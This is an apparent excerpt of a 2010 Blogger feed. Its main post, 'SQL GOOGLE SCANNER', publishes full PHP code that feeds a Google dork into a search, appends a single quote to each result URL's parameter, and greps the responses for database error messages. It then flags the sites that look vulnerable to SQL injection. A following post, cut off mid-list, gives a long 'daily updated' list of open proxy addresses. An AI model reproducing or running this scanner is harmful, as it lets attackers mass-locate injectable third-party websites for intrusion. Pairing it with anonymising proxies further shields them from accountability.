GOOGLE COOL STUFFS'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-1940945803186146555</id><published>2010-08-14T04:31:00.000-07:00</published><updated>2010-08-14T04:33:43.934-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='SQL'/><title type='text'>SQL GOOGLE SCANNER</title><content type='html'>&lt;code&gt;&lt;code&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;PHP CODE BELOW &lt;/span&gt;&lt;br /&gt;________________________________________________________________________________&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;&lt;html&gt;   &lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;&lt;head&gt;  &lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;&lt;title&gt;SQL Google, Coded By asdaaa&lt;/title&gt;  &lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;&lt;style&gt;  &lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;body{  &lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;background: #0F0F0F;  &lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;color: #FFFFFF;  &lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;font-family: monospace;  &lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;font-size: 12px;  &lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;}  &lt;/span&gt;&lt;br /&gt; &lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;input{  &lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;background: #0F0F0F;  &lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;border: 1px solid #00FF00;  &lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;color: #00FF00;  &lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;}  &lt;/span&gt;&lt;br /&gt; &lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;h2{  &lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;color: #55FF2A;  &lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;}  &lt;/span&gt;&lt;br /&gt; &lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;a{ color: #5A5A5A; text-decoration: none; }  &lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;a:visited, a:active{ color: #5A5A5A; text-decoration: line-through; }  &lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;a:hover{ color: #00FF00; text-decoration: line-through; }  &lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;.effectok:hover { text-decoration: underline; }  &lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;.effectfalse:hover { text-decoration: line-through; }  &lt;/span&gt;&lt;br /&gt; &lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;&lt;/style&gt;  &lt;/span&gt;&lt;br /&gt; &lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;&lt;/head&gt;  &lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;&lt;body&gt;  &lt;/span&gt;&lt;br /&gt; &lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;&lt;?php &lt;br /&gt;echo "&lt;h2&gt;SQL Google Scanner By asdaaa&lt;/h2&gt;"; &lt;br /&gt;echo "&lt;form action="''" method="'post'"&gt;"; &lt;br /&gt;echo "&lt;b&gt;Dork&lt;/b&gt;: &lt;p&gt;&lt;input type="'text'" name="'dork'" value="'inurl:php?="id+site:am'"&gt;&lt;/p&gt;"; &lt;br /&gt;echo "&lt;input type="'submit'" value="'Search'"&gt;"; &lt;br /&gt;echo "&lt;hr /&gt;&lt;br /&gt;"; &lt;br /&gt;&lt;br /&gt;if($_POST['dork']) { &lt;br /&gt;&lt;br /&gt;@set_time_limit(0); &lt;br /&gt;@error_reporting(0); &lt;br /&gt;@ignore_user_abort(true); &lt;br /&gt;ini_set('memory_limit', '128M'); &lt;br /&gt;&lt;br /&gt;$google = "http://www.google.com/cse?cx=013269018370076798483%3Awdba3dlnxqm&amp;amp;q=REPLACE_DORK&amp;amp;num=100&amp;amp;hl=en&amp;amp;as_qdr=all&amp;amp;start=REPLACE_START&amp;amp;sa=N"; &lt;br /&gt;&lt;br /&gt;$i = 0; &lt;br /&gt;$a = 0; &lt;br /&gt;$b = 0; &lt;br /&gt;&lt;br /&gt;while($b &lt;= 900) { &lt;br /&gt;$a = 0; &lt;br /&gt;flush(); ob_flush(); &lt;br /&gt;echo "Pages: [ $b ]&lt;br /&gt;"; &lt;br /&gt;echo "Dork: [ &lt;b&gt;".$_POST['dork']."&lt;/b&gt; ]&lt;br /&gt;"; &lt;br /&gt;echo "Getting result from google...&lt;br /&gt;"; &lt;br /&gt;flush(); ob_flush(); &lt;br /&gt;&lt;br /&gt;if(preg_match("/did not match any documents/", Connect_Host(str_replace(array("REPLACE_DORK", "REPLACE_START"), array("".$_POST['dork']."", "$b"), $google)), $val)) { &lt;br /&gt;echo "No result found&lt;br /&gt;"; &lt;br /&gt;flush(); ob_flush(); &lt;br /&gt;break; &lt;br /&gt;} &lt;br /&gt;&lt;br /&gt;preg_match_all("/&lt;h2 class="(.*?)"&gt;&lt;a href="\" class="(.*?)"&gt;/", Connect_Host(str_replace(array("REPLACE_DORK", "REPLACE_START"), array("".$_POST['dork']."", "$b"), $google)), $sites); &lt;br /&gt;echo "Scanning...&lt;br /&gt;"; &lt;br /&gt;flush(); ob_flush(); &lt;br /&gt;while(1) { &lt;br /&gt;&lt;br /&gt;if(preg_match("/You have an error in your SQL|Division by zero in|supplied argument is not a valid MySQL result resource in|Call to a member function|Microsoft JET Database|ODBC Microsoft Access Driver|Microsoft OLE DB Provider for SQL Server|Unclosed quotation mark|Microsoft OLE DB Provider for Oracle|Incorrect syntax near|SQL query failed/", Connect_Host(str_replace("=", "='", $sites[2][$a])))) { &lt;br /&gt;echo "&lt;a href="'" target="'_blank'" class="'effectok'"&gt;".str_replace("=", "='", $sites[2][$a])."&lt;/a&gt; &lt;== &lt;span style="color:'green';"&gt;SQL Injection Var (:&lt;/span&gt;&lt;br /&gt;"; &lt;br /&gt;} else { &lt;br /&gt;echo "&lt;a href="'" target="'_blank'" class="'effectfalse'"&gt;".str_replace("=", "='", $sites[2][$a])."&lt;/a&gt; &lt;== &lt;span style="color:'red';"&gt;SQL Injection Yok Üzgün&lt;/span&gt;&lt;br /&gt;"; &lt;br /&gt;flush(); ob_flush(); &lt;br /&gt;} &lt;br /&gt;if($a &gt; count($sites[2])-2) { &lt;br /&gt;echo "Done&lt;br /&gt;"; &lt;br /&gt;break; &lt;br /&gt;} &lt;br /&gt;$a = $a+1; &lt;br /&gt;} &lt;br /&gt;$b = $b+100; &lt;br /&gt;} &lt;br /&gt;} &lt;br /&gt;&lt;br /&gt;function Connect_Host($url) { &lt;br /&gt;$ch = curl_init(); &lt;br /&gt;curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0); &lt;br /&gt;curl_setopt($ch, CURLOPT_HEADER, 1); &lt;br /&gt;curl_setopt($ch, CURLOPT_URL, $url); &lt;br /&gt;curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); &lt;br /&gt;curl_setopt($ch, CURLOPT_TIMEOUT, 30); &lt;br /&gt;$data = curl_exec($ch); &lt;br /&gt;if($data) { &lt;br /&gt;return $data; &lt;br /&gt;} else { &lt;br /&gt;return 0; &lt;br /&gt;} &lt;br /&gt;} &lt;br /&gt;&lt;br /&gt;function Clean($text) { &lt;br /&gt;return htmlspecialchars($text, ENT_QUOTES); &lt;br /&gt;} &lt;br /&gt;&lt;br /&gt;?&gt;  &lt;/span&gt;&lt;br /&gt; &lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;&lt;/body&gt;  &lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;&lt;/html&gt;&lt;/span&gt;&lt;br /&gt;_______________________________________________________________________________________&lt;br /&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-1940945803186146555?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/1940945803186146555/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2010/08/sql-google-scanner.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/1940945803186146555'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/1940945803186146555'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2010/08/sql-google-scanner.html' title='SQL GOOGLE SCANNER'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-4952925914826864153</id><published>2010-08-05T01:22:00.001-07:00</published><updated>2010-08-05T01:23:38.580-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='proxy'/><title type='text'>PROXY LIST DAILY UPDATED</title><content type='html'>&lt;span style="color: rgb(204, 51, 204);"&gt;85.185.3.210:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;61.35.191.250:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.168.109.60:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.190.16.17:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.249.64.52:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;213.217.58.33:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.124.223.42:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;201.64.156.82:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;213.0.88.86:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;85.185.20.85:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.210.55.157:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.124.213.118:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;213.0.88.87:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;obec-mrsklesy-hlubocky.fofrnet.net:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;85.198.21.129:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;77.48.27.38:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;180.149.49.114:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;91.203.240.77:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;201.88.202.10:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;150.187.141.160:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;174.143.150.83:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;174.36.178.106:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;a4.pantarhei.ba.cust.gts.sk:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;173.203.215.116:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;163.29.124.125:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;ps-zelenivenac-fe0.wmx.mediaworksit.net:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;150.187.148.230:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;141.76.45.17:68660&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;202.110.220.14:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;201.43.7.13:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;201.62.130.9:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;201.14.116.3:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.65.127.163:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;201.15.105.230:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.52.4.82:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.48.218.178:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.31.21.163:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.30.148.202:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.249.81.130:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.162.112.16:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.161.180.43:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.148.158.131:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.118.2.218:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;199.26.254.69:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;199.106.212.15:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;198.182.37.11:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;202.57.69.84:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;203.108.248.132:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;202.86.7.114:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;213.153.62.110:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;202.75.55.247:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;202.247.10.204:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;202.186.33.170:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;202.160.149.244:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;202.169.43.34:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;202.148.3.170:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;202.209.112.35:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;202.43.216.165:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.118.224.148:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.118.224.150:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.218.211.56:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;196.38.158.196:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;196.29.192.136:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;198.165.92.2:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;199.106.212.16:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.10.237.25:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.123.148.50:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.150.76.42:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.241.212.34:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.223.31.51:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.29.103.61:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.39.240.252:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.44.156.251:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.5.80.8:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.64.63.177:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.65.0.25:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.82.81.227:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;201.6.117.106:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;201.6.117.93:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;194.208.34.165:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;202.105.230.226:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;196.202.55.2:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;196.202.50.206:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.49.188.226:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.47.255.96:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.47.14.193:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.39.170.102:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.248.250.125:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.248.250.111:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.248.250.102:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.245.108.170:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;189.47.200.40:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.162.133.139:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;147.228.63.164:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;194.224.150.5:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.189.142.132:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.248.250.109:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.248.250.94:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.94.3.254:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;194.179.76.107:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;190.216.167.93:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;194.112.249.189:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;193.191.142.142:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;193.188.96.17:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;193.207.68.25:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;192.239.84.50:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;194.117.216.75:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;189.19.210.207:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;203.214.131.114:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;203.214.131.102:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;203.214.130.92:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;203.21.47.3:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;203.209.224.234:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;203.207.68.50:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;203.197.21.176:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;203.187.180.169:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;203.172.169.130:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;203.155.172.60:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;203.155.16.130:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;217.23.137.56:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;203.153.25.202:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;213.71.0.156:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.104.161.123:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;203.123.240.112:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;203.209.228.42:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.199.206.208:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;194.44.43.181:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;213.192.246.132:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;203.214.128.102:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;203.214.131.84:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;208.92.249.111:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;203.214.131.4:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;203.214.131.184:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.62.28.178:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;203.123.11.20:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;193.116.157.195:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;202.147.203.18:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.187.142.241:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;193.31.15.90:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;12.111.76.1:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;80.87.208.29:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;80.74.106.29:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;80.168.111.130:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;8.4.59.90:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;8.4.43.87:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;8.4.43.52:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;8.4.43.248:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;8.4.43.174:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;8.4.42.67:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;8.4.42.196:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;8.4.41.79:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;8.4.41.126:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;8.4.40.241:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;8.4.40.182:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;8.4.40.102:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;8.14.32.110:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;79.174.195.84:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;77.94.32.61:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;74.200.228.182:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;72.52.96.31:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;70.84.52.186:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;67.212.226.148:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;66.230.212.203:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;66.11.114.121:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;64.79.194.56:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.13.47:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;80.193.72.145:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;64.69.219.146:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;64.255.180.253:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;64.156.27.81:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;64.211.66.71:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;62.69.178.8:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.234.205.11:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.234.202.193:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;38.107.149.14:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;24.38.31.232:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.165.130.82:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.124.173.220:80&lt;/span&gt;&lt;br 